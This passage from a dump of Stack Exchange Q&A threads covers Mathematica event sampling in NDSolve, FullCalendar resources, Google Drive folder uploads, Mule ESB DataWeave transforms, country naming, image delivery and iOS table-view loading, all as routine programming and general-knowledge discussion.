For example, I fit a line to a subsample of the points and terminate via <code>\"StopIntegration\"<\/code> if fitted line has ~0 slope. However, when I define a regular sampling time for <code>WhenEvent<\/code> (<code>Mod[t, 1]<\/code>), the collected log values have huge errors.\n<code>ode = {\n x'[t] == -.2 x[t]^2 + 2 y[t],\n y'[t] == x[t] + .1 x[t]^2 - 1.5 y[t],\n x[0] == y[0] == 1,\n WhenEvent[Mod[t, 1] == 0, \n If[140 < t < 200, AppendTo[events, {t, Log@x@t}]]]\n };\n\nevents = steps = {};\nif = NDSolveValue[ode, {x, y}, {t, 0, 200}, StepMonitor :> AppendTo[steps, {t, Log@x@t}]];\n\nLogPlot[Through@if@t, {t, 0, 200}, Epilog -> {\n {Blue, AbsolutePointSize@6, Point@steps},\n {Red, AbsolutePointSize@3, Point@events}\n }, ImageSize -> 500]\n<\/code>\n\nI can see two ways to overcome this. 1) Set a method for <code>NDSolve<\/code> with uniform known stepsize and make the <code>WhenEvent<\/code> test at the same times. For certain reasons I want to avoid this. For one, it's nice to rely on the automatic adaptive stepsize algorithm. 2) Force <code>WhenEvent<\/code> to only evaluate when an internal step is taken by the integrator without modifying the step size manually. I failed to achieve this reliably. How to do this?\nAs you can see, it's perfectly unnecessary to increase accuracy\/precision, as at <code>steps<\/code> the solution values are correct and I don't need to have extra values in between them. Note, that I cannot use <code>StepMonitor<\/code> solely, as I have to stop integration when a condition is met (based on the collected points).\nDetails\nThe problem is in the way Mathematica calculates solution values but not via the actual integrator method: when a value is calculated, <code>WhenEvent<\/code> interface does not know where the next point will be, so it has to extrapolate. It just does it in a horrible way. Somewhere in the process the actual derivative is lost, or even worse, a constant derivative is assumed, resulting in wild errors. See the following, even simpler example:\n<code>Block[{events = {}, steps = {}, if, x, t},\n if = NDSolveValue[{x'[t] == -1\/10 x[t], x[0] == 1, \n WhenEvent[Mod[t, #] == 0., AppendTo[events, {t, x[t]}]]}, \n x, {t, 0, 100},\n StepMonitor :> {AppendTo[steps, t]}, \n Method -> \"ExplicitRungeKutta\"(*,WorkingPrecision -> 50*)];\n Plot[if@t, {t, 0, 100}, \n Epilog -> {Green, Point@events}, \n PlotRange -> {All, {1, -1}}, GridLines -> {steps, {0}}, \n PlotLabel -> Row@{\"d = \", #}]\n ] & \/@ {10, 1, 1\/10, 1\/100}\n<\/code>\n\nVertical gridlines indicate internal steps, green points are the detected events. If you uncomment the option <code>WorkingPrecision -> 50<\/code>, the result is what one would expect - at the cost of at least double time required and I had to convert all reals to exact numbers.\nUpdate\nAccording to TechSupport, there is no way at the moment to evaluate a <code>WhenEvent<\/code> test only when the integrator takes a step. Maybe in a future version.\nComment: @ChrisK Sure: you can fit a line to a large sample of points, but the derivative is checked at a point. For certain cases, I want to check whether the last 10000 datapoints are equilibrated (slope ~ 0) or in exponential decay (slope is of log.values is negative). 
Furthermore, my solution could heavily oscillate, while still could be a limit cycle.\nComment: Just a note, the Log doesn't seem to matter - same problem without it.\nComment: Is there a reason you want to fit a line to points to estimate the slope rather than using something like `WhenEvent[Abs[x'[t]] < 10^-4, \"StopIntegration\"]`?\nComment: I see, thanks! That sounds generally useful, I'd be happy if you posted the final product.\nComment: @MichaelE2 I am aware of this method but try to collect more than one point this way. The problem is that whenever the test of the `WhenEvent` becomes true, it won't check that test any more, even if you reset the flag.\nAnswer: This is interesting even if it's not a perfect answer. It makes me suspect a bug somewhere.\nI thought, for reasons that elude me -- it just occurred to me to try -- of enforcing a certain checking of <code>x[t]<\/code> by adding a \"trivial\" discrete variable and updating it from time to time. It is trivial in the sense that it never changes value and does not affect the OP's system. I guess in part I thought the variable would force <code>NDSolve<\/code> to track it, and perhaps <code>x[t]<\/code> would be calculated instead of extrapolated (for it seemed that extrapolation might be the explanation of the bad values for <code>x[t]<\/code> in the OP's code). So I changed the first DE to\n<code>x'[t] == -.2 x[t]^2 + 2 y[t] + a[t]\n<\/code>\nwhere <code>a[t] == 0<\/code>.\nI was able to get what I wanted by changing the event action \n<code>WhenEvent[Mod[t, 1] == 0, \n If[140 < t < 200, AppendTo[events, {t, Log@x@t}], a[t] -> 0]]\n<\/code>\nBut that was a typo. I meant to try the following which did not work:\n<code>WhenEvent[Mod[t, 1] == 0, \n If[140 < t < 200, AppendTo[events, {t, Log@x@t}]; a[t] -> 0]]\n<\/code>\nI couldn't (and still cannot) explain why one worked and the other failed. I got the following, respectively:\n\nThen I thought, what if the discrete variable <code>a[t]<\/code> was update periodically, but not very often, so that the OP's goal of letting the step size grow somewhat large might might be realized. This is, admittedly, similar to @user21's approach with <code>MaxStepSize<\/code>, but that approach still had \"extrapolation\" errors, albeit much smaller. This is unlike what <code>a[t] -> 0<\/code> produced above (left image):\n\nAccording to my speculative theory, an event of the form <code>WhenEvent[Mod[t, dt] == 0, a[t] -> 0]<\/code>, might cause <code>x[t]<\/code> to be assigned the correct value. (I was beginning to think that extrapolation is not the reason for the wild values in the OP's code.) With <code>dt = 10<\/code> or <code>20<\/code> everything seems to work fine. The value chosen for <code>dt<\/code> seemed to affect the step size (because <code>NDSolve<\/code> is worried that some discontinuous change to the ODE is going to occur at such an event). So I thought, how large can I make <code>dt<\/code>? 
I found that around <code>85<\/code>, strange things happen.\n<code>ode2 = {x'[t] == -.2 x[t]^2 + 2 y[t] + a[t], \n y'[t] == x[t] + .1 x[t]^2 - 1.5 y[t],\n a[0] == 0, x[0] == y[0] == 1, \n WhenEvent[Mod[t, 1] == 0, \n If[140 < t < 200, AppendTo[events, {t, Log@x@t}](*,a[t]->0*)]],\n WhenEvent[Mod[t, dt] == 0, a[t] -> 0]};\n\nTable[\n events = steps = {};\n if = NDSolveValue[ode2, {x, y}, {t, 0, 200}, \n StepMonitor :> AppendTo[steps, {t, Log@x@t}], \n DiscreteVariables -> {a}];\n LogPlot[Through@if@t, {t, 0, 200}, \n Epilog -> {{Blue, AbsolutePointSize@6, Point@steps}, {Red, \n AbsolutePointSize@3, Point@events}}, ImageSize -> 250, \n PlotLabel -> HoldForm[dt] == dt],\n {dt, 85, 88}\n ] \/\/ Partition[#, 2] & \/\/ GraphicsGrid\n<\/code>\n\nThree of the plots are have no error message; the upper right one has this error:\n\nCoordinate {171., Complex[0.38451996298641833`, 3.141592653589793]} should be a pair of numbers, or a Scaled or Offset form.\n\nThe error just means that the value of some <code>x[t]<\/code> are negative when <code>dt = 86<\/code>, which in not inconsistent with the graph of the solution. For <code>dt = 85<\/code> or <code>88<\/code>, the values of <code>event<\/code> seem accurate, but in the case of <code>dt = 88<\/code>, there's a little glitch in the solution. As I said, it appears to be buggy (unless someone can explain why this is to be expected).\nIn any case, adding <code>a[t] -> 0<\/code> in\n<code>WhenEvent[Mod[t, 1] == 0, \n If[140 < t < 200, AppendTo[events, {t, Log@x@t}], a[t] -> 0]]\n<\/code>\nseems to be a workaround, even though I cannot explain why it works. None of these events, it seems to me, should affect the computed solutions to <code>x[t]<\/code> and <code>y[t]<\/code>. But they do.\nComment: Interesting findings, thanks for the analysis! If we can close i on the issue, I'll file it for TechSupport.\nComment: You'd have to use `MaxStepSize`->1; Mod[t,dt] in a `WhenEvent` is documented to sample at dt. Maybe I am missing the point?\nComment: @user21 Doesn't `Mod[t,dt]` **add** a step size every `dt`? I don't know how a `Mod` event affects the adaptive step size. I do notice that when the event action is not null, `NDSolve` does take a step at the event time; however, it takes other steps in between, if the time between events is long enough. I know I'm confused about something. I'm surprised that changing the timing of an event that seems to do nothing affects the quality of the solution. I assume the event action `a[t] -> 0` is treated as a discontinuity and that in turn interferes with the next step in an obscure way.\nComment: **That** is the point: specifying a high-resolution event-condition **does not** (by default) increases the resolution of the adaptive stepsize algorithm. It either should, or there should be a way to only test event conditions when a step is actually taken.\nComment: @Istv\u00e1nZachar You can force `NDSolve` to take a step at each event by having the `WhenEvent` action return `\"RestartIntegration\"` (but I thought you wanted to avoid the extra sampling).\nComment: Yes, that is useful. But what I actually want is the other way around: only evaluate a `WhenEvent` when a step is taken. 
This seems impossible, unless I specify the step size manually.\nAnswer: One way to do this is not to restrict <code>NDSolve<\/code> to use a fixed size method but to restrict the <code>MaxStepSize<\/code>\n<code>if = NDSolveValue[ode, {x, y}, {t, 0, 200}, \n StepMonitor :> AppendTo[steps, {t, Log@x@t}], MaxStepSize -> 2];\n<\/code>\nSo if you use <code>WhenEvent[Mod[t, dt] == 0....<\/code> I'd think you want <code>MaxStepSize -> dt<\/code>\nFrom the documentation of <code>WhenEvent<\/code>: Mod[t,dt]==0 sample at regular intervals dt in the time variable t. But perhaps I miss the point?\nComment: @Istv\u00e1nZachar, it does not discard the adaptive step size method, it limits it. That's something different.\nComment: I appreciate the effort, but `MaxStepSize` explicitly discards the adaptive step selection method and unnecessarily multiplies step points. Something I rather avoid as I wrote. Emphasized it in my edit.\nComment: You are right, but what I want is not to restrict the default step method in any way, if possible and not to collect too many datapoints.\nAnswer: Here is a potential workaround, that works on the OP's MWE. We'll restart integration at the beginning of logging of events. Since I'm not sure why the OP's code fails, I'm not sure why this fixes it. It potentially adds a step at <code>t == 140<\/code>, and it causes <code>NDSolve<\/code> to calculate a new starting step size. It's hard to know whether this would slow things down in all cases, but it has a negligible effect on the number of steps in the OP's MWE. I'll log the steps in <code>steps2<\/code> and <code>events2<\/code> to compare with the OP.\n<code>ode = {x'[t] == -.2 x[t]^2 + 2 y[t], \n y'[t] == x[t] + .1 x[t]^2 - 1.5 y[t], x[0] == y[0] == 1, \n WhenEvent[Mod[t, 1] == 0, If[140 < t < 200, AppendTo[events2, {t, Log@x@t}]]], \n WhenEvent[t == 140, \"RestartIntegration\"]};\n\nevents2 = steps2 = {};\nif = NDSolveValue[ode, {x, y}, {t, 0, 200}, \n StepMonitor :> AppendTo[steps2, {t, Log@x@t}]];\n\nLogPlot[Through@if@t, {t, 0, 200}, \n Epilog -> {{Blue, AbsolutePointSize@6, Point@steps2}, {Red, \n AbsolutePointSize@3, Point@events2}}]\n<\/code>\n\nThe steps are about the same, with an adjustment at the restart of integration.\n<code>NumberLinePlot[{steps[[All, 1]], steps2[[All, 1]]}, \n GridLines -> {{140}, None}]\n<\/code>\n\nThere is a small error between the computed solution and the event values:\n<code>With[{xif = First@if},\n maxerr = Max@Abs[Differences \/@ MapAt[Log @* xif, events, {All, 1}]]\n ]\n(* 3.81291*10^-10 *)\n<\/code>\nWe can see that this does not really fix the error observed in the OP:\n<code>Show[\n plot = LogPlot[First[if][t], {t, 139, 200}], \n Graphics[{{Blue, AbsolutePointSize@6, Point@steps2}, {Red, \n AbsolutePointSize@3, Point@events2}}],\n PlotRange -> {{139, 200}, Last@PlotRange@plot + maxerr {-1, 1}}]\n<\/code>\n\nNote that the initial slopes of the event arcs are close to the derivative of <code>x[t]<\/code> at <code>t == 140<\/code>, where integration (re)started. A similar pattern may be observed in the OP. 
This is not strictly true, nor does it seem that each arc starts with the same rate of change.\n<code>SplitBy[Differences@Exp@events2[[All, 2]], Positive][[1 ;; ;; 2, 1]]\nFirst[if]'[140]\n(*\n {6.90459*10^-10, 6.54047*10^-10, 6.05088*10^-10, 6.11475*10^-10}\n 7.31003*10^-10\n*)\n<\/code>\nIf the arcs are connected to <code>x'[140]<\/code>, then this workaround may only work accidentally, as it were, in the OP's MWE.\nComment: Unfortunately, restarting only works if the function does not change much afterwards. I've quite a few cases where restart does not work - especially, if I include the whole range for the `WhenEvent` and not just after `t=140`.\nComment: @Istv\u00e1nZachar I was afraid of that, given my last figure. I think that `NDSolve` is interpolating between steps to get `x[t]` at the events, but it appears that it has botched the interpolation formula (a somewhat wild guess).\n","meta":{"source":"mathematica.stackexchange","title":"Force WhenEvent to respect default stepsize","dup_signals":{}},"subset":"stackexchange"} +{"text":"fullcalendar scheduler sources\n\nQuestion: I am supposed to see 2 columns,'Room A' and 'Room B'. However, I can see only one column without either. please let me know what I missed. \nThank you in advance\n<code><script>\n $(function() {\n\n \/\/ page is now ready, initialize the calendar...\n\n $('#calendar').fullCalendar({\n schedulerLicenseKey: 'CC-Attribution-NonCommercial-NoDerivatives',\n \/\/ put your options and callbacks here\n defaultView: 'agendaDay',\n events: [\n \/\/ events go here\n ],\n Resources: [\n { id: 'a', title: 'Room A' },\n { id: 'b', title: 'Room B', eventColor:'green'}\n ]\n })\n });\n<\/script>\n<\/code>\nAnswer: Your Resources is capitalized. You need to change it to lower case \n<code> resources: [\n { id: 'a', title: 'Room A' },\n { id: 'b', title: 'Room B', eventColor:'green'}\n ]\n<\/code>\n","meta":{"source":"stackoverflow","title":"fullcalendar scheduler sources","dup_signals":{}},"subset":"stackexchange"} +{"text":"Unable to upload file in specific folder in google drive using REST API\n\nQuestion: I am trying to upload a local file to a specified folder in Google Drive using REST API from android app, the file is uploading in the root directory but not uploading in the specified folder. 
No error in the API.\nUsing the following API:\nhttps:\/\/developers.google.com\/drive\/api\/guides\/manage-uploads#multipart\nTried passing the folder ID in metadata in following ways:\n1.\n<code>String[] arr = {parentFolderId}; \njsonObject.put(\"parents\", arr);\njsonObject.put(\"name\", file.getName());\n<\/code>\n\n<code>JSONArray jsonArray = new JSONArray();\nJSONObject jsonObject1 = new JSONObject();\njsonObject1.put(\"id\", parentFolderId);\njsonArray.put(jsonObject1);\njsonObject.put(\"parents\", jsonArray);\njsonObject.put(\"name\", file.getName());\n<\/code>\n\n<code>ArrayList<String> arrayList = new ArrayList<>(); \narrayList.add(parentFolderId);\njsonObject.put(\"parents\", arrayList);\njsonObject.put(\"name\", file.getName());\n<\/code>\n\"parents\" parameter isn't working, also tried using \"addParents\" parameter.\nKindly suggest a way to specify the parent folder ID.\nComment: In the future you should include the error message you are getting from these calls.\nComment: There is no error message in the API response\nComment: If there is no error message how do you know its not working?\nComment: The file is uploading in root directory and not the specified folder.\nComment: parse your object to json lets see what it looks like.\nAnswer: I am not a java or android expert but this may get you started.\n<code>String folderId = \"folderID\";\nFile fileMetadata = new File();\nfileMetadata.setName(\"FileName\");\nfileMetadata.setParents(Collections.singletonList(folderId));\n\nFile file = driveService.files().create(fileMetadata)\n.setFields(\"id, parent\")\n.execute();\nSystem.out.println(\"File ID: \" + file.getId());\n<\/code>\nor maybe this\n<code>String UploadFileToGoogleDrive(String sFullPath, String sFileName, String sParentFolderId) { \n com.google.api.services.drive.model.File fileMetadata = new com.google.api.services.drive.model.File();\n fileMetadata.setName(sFileName);\n fileMetadata.setParents(Collections.singletonList(sParentFolderId));\n java.io.File filePath = new java.io.File(sFullPath);\n FileContent mediaContent = new FileContent(null, filePath);\n try {\n com.google.api.services.drive.model.File file = googleDriveService.files().create(fileMetadata, mediaContent)\n .setFields(\"id, parents\")\n .execute();\n return file.getId();\n } catch (IOException e) { \n return null;\n } \n}\n<\/code>\npure rest html\nIm not exactly usre what you mean by \"I am using REST API.\" but if you are trying to do this completely yourself make sure that you build the body properly that is where the metadata is submited.\n<code>POST https:\/\/www.googleapis.com\/drive\/v3\/files?key=[YOUR_API_KEY] HTTP\/1.1\n\nAuthorization: Bearer [YOUR_ACCESS_TOKEN]\nAccept: application\/json\nContent-Type: application\/json\n\n{\n \"name\": \"test\",\n \"parents\": [\n \"folderId\"\n ]\n}\n<\/code>\nComment: I have used \"parents\" parameter but its not working. I am not using SDK, I am using REST API.\nComment: i would print out your body. Sounds like the formatting isnt right if your not using the SDK. 
I put in an edit of what the body is supposed to look like in raw json.\nComment: \"parents\": [\n \"folderId\"\n ]\n\nI tried this but isn't working\nComment: Define \"isnt working\"\nComment: The file is uploading in root directory and not the specified folder.\nComment: What about the name of the file is that right?\nComment: Let us [continue this discussion in chat](https:\/\/chat.stackoverflow.com\/rooms\/246228\/discussion-between-mahesh-ambekar-and-daimto).\n","meta":{"source":"stackoverflow","title":"Unable to upload file in specific folder in google drive using REST API","dup_signals":{}},"subset":"stackexchange"} +{"text":"Mule ESB Flow calling SOAP not working but worked from SOAP UI\n\nQuestion: Details : I have created on flow in MuleESB which is calling a web-service without any parameter just sending it username, password and token in a property and it is working fine.\nBut the second API I want to post some parameters while calling soap request but I don't know how to use it I tried to pass through set payload but no response.\n<code><http:listener-config name=\"HTTP_Listener_Configuration\" host=\"0.0.0.0\" port=\"8081\" doc:name=\"HTTP Listener Configuration\"\/>\n<http:request-config name=\"HTTP_Request_Configuration\" host=\"webservicehostadd\" port=\"443\" doc:name=\"HTTP Request Configuration\">\n <http:basic-authentication username=\"username\" password=\"pass\"\/>\n <\/http:request-config>\n <ws:consumer-config name=\"Web_Service_Consumer\" wsdlLocation=\"https:\/\/xxxx\/1.0?wsdl\" service=\"xxx\" port=\"xxxx\" serviceAddress=\"https:\/\/xxxxx\/1.0\" connectorConfig=\"HTTP_Request_Configuration\" doc:name=\"Web Service Consumer\"\/>\n <flow name=\"mycustomflow\">\n <http:listener config-ref=\"HTTP_Listener_Configuration\" path=\"\/TEST\" doc:name=\"HTTP\"\/>\n <set-property propertyName=\"APIKey\" value=\"xxx-xxx-xxx-xxx-xxx\" doc:name=\"Property\"\/>\n <dw:transform-message doc:name=\"Transform Message\" metadata:id=\"xxx-xxx-xxx-xxx-xxxxxxxx\">\n <dw:input-payload mimeType=\"application\/xml\"\/>\n <dw:set-payload><![CDATA[%dw 1.0\n%output application\/xml\n%namespace ns0 http:\/\/localhost\/getDetails:getDetailsWSD\n---\n{\n ns0#getDetails: {\n getDetailsOrder: {\n ID: payload.ns0#getDetails.getDetailsOrder.ID,\n AllData: payload.ns0#getDetails.getDetailsOrder.AllData\n }\n }\n}]]><\/dw:set-payload>\n <\/dw:transform-message>\n <ws:consumer config-ref=\"Web_Service_Consumer\" operation=\"employeeDetails\" doc:name=\"Web Service Consumer\"\/>\n <\/flow>\n\nIt showed the below error:\n\nException while executing: \n[row,col]: [1,1]\nUnexpected character '{' (code 123) in prolog; expected '<'\n at [row,col {unknown-source}]: [1,1].\n<\/code>\nAnswer: Updated answer:\n<code><dw:transform-message metadata:id=\"XXXXX\" doc:name=\"Transform Message\">\n<dw:set-payload><![CDATA[\n %output application\/xml skipNullOn=\"everywhere\" \n %namespace ns0 localhost\/getDetails:getDetailsWSD \n ---\n {\n ns0#getDetails: { \n getDetailsOrder: { \n ID: payload.ns0#getDetails.getDetailsOrder.ID, \n AllData: payload.ns0#getDetails.getDetailsOrder.AllData \n } \n } \n }]]>\n<\/dw:set-payload>\n<\/dw:transform-message>\n<\/code>\nIn your scenario: you are passing a body in XML format and sometimes an empty body in your Postman requests. \nPassing an empty body results your payload to be <code>{NullPayload}<\/code>. 
To handle this, we have to remove explicitly defining the input mime type: <code><dw:input-payload mimeType=\"application\/xml\"\/><\/code>.\nIn your transformation: <code>ID: payload.ns0#getDetails.getDetailsOrder.ID,<\/code>. You are retrieving a value from an empty payload and this will fail. To avoid failing, we have added: <code>skipNullOn=\"everywhere\"<\/code>. You can read more about it here.\nI have tried the transformation myself which results to this:\n<code><?xml version='1.0' encoding='UTF-8'?>\n<ns0:getDetails xmlns:ns0=\"http:\/\/localhost\/getDetails:getDetailsWSD\">\n <getDetailsOrder\/>\n<\/ns0:getDetails>\n<\/code>\nI think we are done with your initial issue regarding transformation of your empty payload. Your concern now is consuming the web service.\nThank you.\nComment: I tried but it showed the below error:\nAnd i am using POSTMAN to try this api and sending the input as params.\n\nException while executing: {NullPayload} ^ Unexpected character 'N' at payload@[1:2] (line:column), expected '\"'.\nComment: Can you provide a screenshot of your Postman request? Is the body of your request empty?\nComment: yes sometimes it is empty some times error as stated above.\nComment: I see. So the parameters are optional?\nComment: Yes they are. but if they are null means no values then it is showing the result on SOAP UI as \"please enter parameters\"\nComment: Its very urgent to me kindly help me to solve this one!\nComment: Kindly provide the body of the request if it is not empty.\nComment: If \n\nThen body is\n Exception while executing: \n [row,col]: [1,1]\n Unexpected character '{' (code 123) in prolog; expected '<'\n at [row,col {unknown-source}]: [1,1].\n\nIf \n\n Exception while executing: \n {NullPayload}\n ^\n Unexpected character 'N' at payload@[1:2] (line:column), expected '\"'.\nComment: Try this:\n\n \n%output application\/xml skipNullOn=\"everywhere\"\n%namespace ns0 http:\/\/localhost\/getDetails:getDetailsWSD\n---\n{\n ns0#getDetails: {\n getDetailsOrder: {\n ID: payload.ns0#getDetails.getDetailsOrder.ID,\n AllData: payload.ns0#getDetails.getDetailsOrder.AllData\n }\n }\n}\nComment: Its showing blank result and in mule it is showing below log:\n\nINFO [[checkgsbmock].HTTP_Listener_Configuration.worker.01] com.mulesoft.weave.mule.utils.MuleWeaveFactory$: MimeType was not resolved '*\/*' delegating to Java.\nComment: @Mahesh_Loya Now i have a SOAP web service with ws security username password while in SOAP UI i am calling this service and adding the outgoing ws-security configuration username password add nonce and add created and applying this WS in sending the request. Response is showing but how to do from Mule CXF. \nWell i know that mule web service consumer has this option but unfortunately i don't know that bu using thew ws consumer but flow doesn't deployed it shows failed and in console shows some WSDLUtils.java error.\n","meta":{"source":"stackoverflow","title":"Mule ESB Flow calling SOAP not working but worked from SOAP UI","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why some countries have more than one name?\n\nQuestion: I know Persian Language, In persian (Farsi) that is an old language we call Netherlands \"Holland\" , call Germany \"Alman\", Call Poland \"Lahestan\", call India \"Hend\" and etc.\nWhat is the reason and Why these countries have more than one name?\nComment: There is no single reason. Instead, different countries have acquired different names due to a range of different reasons. 
For example, the Netherlands is called Holland, because [Holland](http:\/\/en.wikipedia.org\/wiki\/Holland) is its most famous and important province. Germany is called Almain after the [Germanic Alemanni tribe](http:\/\/en.wikipedia.org\/wiki\/Alemanni). I suggest focusing on the names of a single country to make this question less overwhelmingly broad.\nComment: Did you do any research before posting? [Possible overlap](http:\/\/history.stackexchange.com\/q\/8590\/1401) Not strictly a duplicate, but related. [Overlap2](http:\/\/history.stackexchange.com\/q\/14468\/1401)\nComment: in case of the Netherlands, it's stupid ignorance (including sadly on the part of a lot of Dutch people).\nComment: The question might not be \"too broad,\" now that I have narrowed the focus to \"these\" countries.\nAnswer: I will answer the part of your question about these four specific names. The Persian names for Holland and Germany are recent borrowings from French. Lehest\u0101n is borrowed from Turkish and derives from the name of the Lendians, a Slavic tribe who once lived in what is now Poland. Hend is an Arabicised form of Middle Persian hind\u016bg, Old Persian hind\u016b-, Sanskrit sindhu-, the ancient name of the province now known as Sindh.\nAnswer: There are many Geo political reasons for that. Most of the other names are kept by other countries. India is called India (from Indus) because British kept it. Its called Hindustan (Land of Hindus) because Arabs kept it. Germans call their country Deutschland but internationally it is called as Germany. It is the same as we have synonyms in any language for a word. If you consider Japan, they call it Nippon meaning Land of rising sun. So these different meanings give a country multiple names.\nAnswer: Historically, every country had many different names - what they called themselves, and what others called them. Conquerors came and said \"This is now SomethingLand\" while the people who lived there were already calling it \"OurIsland\" in their language or \"LandOfTrees\" in their language or whatever. [There is a claim that \"Canada\" comes from an Iroquoian word for \"the village\" because someone asked a guide \"what do you call all of this place?\" - it might not be true though.] Some folks called their neighbours Outsiders and their homes Outside, while those outsiders called themselves something different.\nThese days we're usually polite and call countries what they want to be called. But even that can be complicated. There is the province thing (this gives you not only Holland for the Netherlands, but England for the UK) but there is also the matter of abbreviations. Do you say the US or the USA or America? \nIn the end, there are a number of different words for \"the Netherlands\" in 10 different languages for exactly the same reason there are a number of different words for \"cat\" or \"contract.\" They are different languages.\nAnswer: Some countries have a \"second\" name that is derived from its most famous state or province. For instance, \"Holland\" is the most famous province of the Netherlands, Farsi (Persia) of Iran, etc. \"Schweiz\" or \"Switzerland\" is the most famous state of a country whose official name is the \"Confederation of Helvetia.\"\n\"Germany,\" in its English form, was named after a group of \"Germans,\" as was Aleman (Alemani). 
But the country's \"real\" name, in its native language, is \"Deutschland.\"\nComment: The English designation of the people of the Netherlands as \"Dutch\" is an old, but established error.\nComment: ...which confuses a lot of us English speakers because we call people who live in the Netherlands \"Dutch\", so logically if we were to call anywhere \"Dutch-land\" it would be Holland, not Germany.\nAnswer: A lot of variation in country names is based on translations. For instance, \"Netherlands\" means \"Low Countries\" and is called, in French, \"Pays-Bas\" which has the same meaning, but looks significantly different. It shall be noted that the United Nations has six official languages into which most UN documents are translated; therefore, though each UN member decides on its own name, it has to provide (at least) six variants for these six languages. Since these languages use widely different signs, one of them (Chinese) being non-alphabetic, a country cannot, logically, have a single official name valid worldwide.\nBeyond translations, it so happens that countries may change names, and the new name is not necessarily adopted immediately and worldwide. For instance, in 1989, Burma changed its name to \"Republic of the Union of Myanmar\", shortened to \"Myanmar\", but many countries refused to recognize the legitimacy of the government of Burma (a military dictatorship), hence its ability to change the formal name of the country. As a UN member, the official English version of the country name is still \"Myanmar\", but \"Burma\" remains in wide usage in some other countries. For instance, this official document from the Australian government can be seen to use both \"Burma\" and \"Myanmar\" as country name, sometimes switching within the same paragraph with no explanation.\nCountry names have a huge symbolic value and can lead to interferences with and from other countries. Case in point: Macedonia (in the UN, Macedonia is known as \"the former Yugoslav Republic of Macedonia\", a name which is officially \"provisional\" and has been so for more than two decades).\n","meta":{"source":"history.stackexchange","title":"Why some countries have more than one name?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Optimal delivery method for a large quantity of images\n\nQuestion: I have a website centered around an online chat application where each user can have up to several hundred contacts. Each contact has there own profile image. I want to make it so that the contact's profile image is loaded next to there name. However, having the user download 100+ images every time they load the site seems intensive (Studies have shown that as much as 40% of users don't utilize there cache). Each image is around 60x60 pixels in dimension. \nWhen I search on google or sign on to facebook, dozens of images are served nearly instantaneously. Beyond just having fast servers and a good connection, what are the optimal methods for delivering so many images to the user?\nPossible approaches I have come up with are:\n\nStoring each user's profile image in a database, constructing one image in a php file, than having the user download that, then using css to display each profile image. However, this seems extremely intense on the server and referencing such a large file so many times might take a toll on the user's browser.\nUsing nginx rather than apache to server the images (nginx generally works better to server static content such as this). 
However, this seems more like an optimization to a solution, rather than a solution in itself.\n\nI am also aware that data can be delivered across persistent http connections so multiple requests do not have to be made to the server for multiple files. However, exactly how many files can be delivered across one persistent connection. Would this persistent model mean that just having the images load as separate files would not necessarily be a bad idea?\nAny suggestions, solutions, and\/or notes on personal experiences with relevant matters would be greatly appreciated. Scalability is extremely important here, as well as cross-browser support (IE7+, Opera, Firefox, Chrome, Safari)\nEDIT: I AM NOT USING JQUERY.\nComment: Maybe you've already looked into stuff like this, but a common way to solve the \"too much data returned at once\" issue is pagination. Simply don't return all their contacts at once. For an example, look at how myspace and facebook list your friends. They're not all served up at once, and they have various sorting and searching features, because the user is really just looking at their contacts to find one, or a few people, or browse them slowly. The usage pattern doesn't really show a need to display all of them all the time.\nComment: That makes sense. However, on my page the contacts list is displayed with all the contacts at once for enhanced functionality. I can make it so the image only shows up when the chat screen is opened, but am curious if having them all load at once is a possibility.\nComment: I think you would have to learn how the caching mechanism work on browsers to get all of those images to the users browser and keep it there. The problem with caching is mostly on the web site side sending cookies then the users browser.\nComment: I recently came across this blog post that may be helpful: http:\/\/blog.teachstreet.com\/homepage\/how-to-use-amazon-s3-scaling-image-hosting\/\nComment: Thank you for the informative blog post. Using an external host such as S3 might be a good option here. My site without the images has a very, very small file usage to user ratio. Being able to scale the images portion of the hosting separate from everything else would make things easier.\nAnswer: Here's a jquery plugin that delays loading images until they're actually needed (i.e., only loads images \"above the fold\".)\nhttp:\/\/www.appelsiini.net\/2007\/9\/lazy-load-images-jquery-plugin\nAn alternative may be to use Flash to display just the images. The advantage is Flash is a much stronger local cache that you have programm\nComment: I am not using jQuery. Flash definitely would be nice but it is something I want to avoid for greater compatibility.\n","meta":{"source":"stackoverflow","title":"Optimal delivery method for a large quantity of images","dup_signals":{}},"subset":"stackexchange"} +{"text":"slow loading when clicked on table view cell\n\nQuestion: When i click on table view cell, it will be in the same table view for some time(till the next page is completely load) then it will display the next view..\ni want on click on the table view cell, it should immediately goto next page and show the loading page popup..\ni have tried with impActivityAgent and also tried to show alert view when it will enter the next page(but view is of previous page ie table view).. but.. 
its loading the page completely, which will take time and then its showing alert..\nin next page i am posting and parsing the data which will take time, during that time i want to show the activity indicator..\ni have tried many methods, but still its first loading the next page completely and then displaying the contents or alertView or activity indicator and i am not able to show the activity indicator when clicked on table view cell..\nMY CODE:\n<code>- (void)tableView:(UITableView *)tableView didSelectRowAtIndexPath:(NSIndexPath *)indexPath\n{\n nextTableViewController *doc = [[nextTableViewController alloc]initWithNibName:@\"nextTableViewController\" bundle:nil];\n [self.navigationController pushViewController:doc animated:YES];\n}\n<\/code>\nAND NEXT VIEW CONTROLLER IS :\n<code>- (void)viewDidLoad\n{\n[super viewDidLoad];\n\/\/ Do any additional setup after loading the view from its nib.\n[[ImpActivityAgent defaultAgent] makeBusy:YES];\n\nNSURL *loadUrl = [NSURL URLWithString:[NSString stringWithFormat:@\"http:\/\/%@\/gmail.com\",inputURL]];\nhtmlData = [NSData dataWithContentsOfURL:loadUrl];\nself.htmlSTR = [[NSString alloc] initWithData:htmlData encoding:NSUTF8StringEncoding];\n[self parseHTML];\n}\n<\/code>\nand in Parse function i am Parsing the content which i got as response in HTML formate using \"hpple\" Parser..\nComment: Post your code for tableView:didSelectRowAtIndexPath:, and whatever you do in the next controller in viewDidLoad, viewDidAppear, etc.\nComment: Check any back ground process is going on after u selected the row. Post some relevant code.\nComment: no there is no back groung Process going on..\nComment: @Raju, Post your code\nComment: please find the above edited question with code..\nComment: @Raju you are calling webservice in Viewdidload . so when u push your controller then first it will get data from service and after that it will push to next view. so paste your whole code in viewdidappear as per rdelmar's suggesion.\nAnswer: Just use one separate thread to handle parsing. Hope this code will help you. \n<code>- (void)viewDidLoad\n{\n[super viewDidLoad];\n\/\/ Do any additional setup after loading the view from its nib.\n[[ImpActivityAgent defaultAgent] makeBusy:YES];\n\n[NSThread detachNewThreadSelector:@selector(newMethodForParsing) toTarget:self withObject:nil];\n\n}\n\n-(void)newMethodForParsing\n{\nNSURL *loadUrl = [NSURL URLWithString:[NSString 